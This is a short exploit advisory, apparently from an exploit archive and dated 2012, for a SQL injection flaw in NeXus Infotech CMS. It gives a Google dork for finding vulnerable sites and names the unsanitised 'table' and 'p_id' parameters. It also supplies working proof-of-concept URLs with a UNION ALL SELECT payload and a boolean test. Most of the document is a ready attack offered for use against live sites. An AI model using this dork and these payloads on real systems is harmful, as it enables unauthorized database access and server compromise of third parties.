# Exploit title : NeXus Infotech CMS SQL Injection Vulnerability
# Date : May 05,2012
# Author : gr00ve_hack3r
# Contact : groove.hacker7/a/t/gmail.com
# Homepage : www.gr00ve-hack3r.com
# Vendor : NeXus Infotech
# Vendor Site : http://www.nexusinfotech.org/
# Google Dork : intext:"Powered By NeXus Infotech"
# Vulnerability :
GET parameter " table " and " p_id " accept unsanitised user input and
result in SQL injection which can lead to server compromise
# PoC Exploit :
[+] http://[host].com/index.php?pagename=photogallery&table=photogallery
UNION ALL SELECT 1, 1, CONCAT(CHAR(1),CHAR(1),CHAR(1))#
[+] http://www.[host].com/details.asp?p_id=1 AND 2=2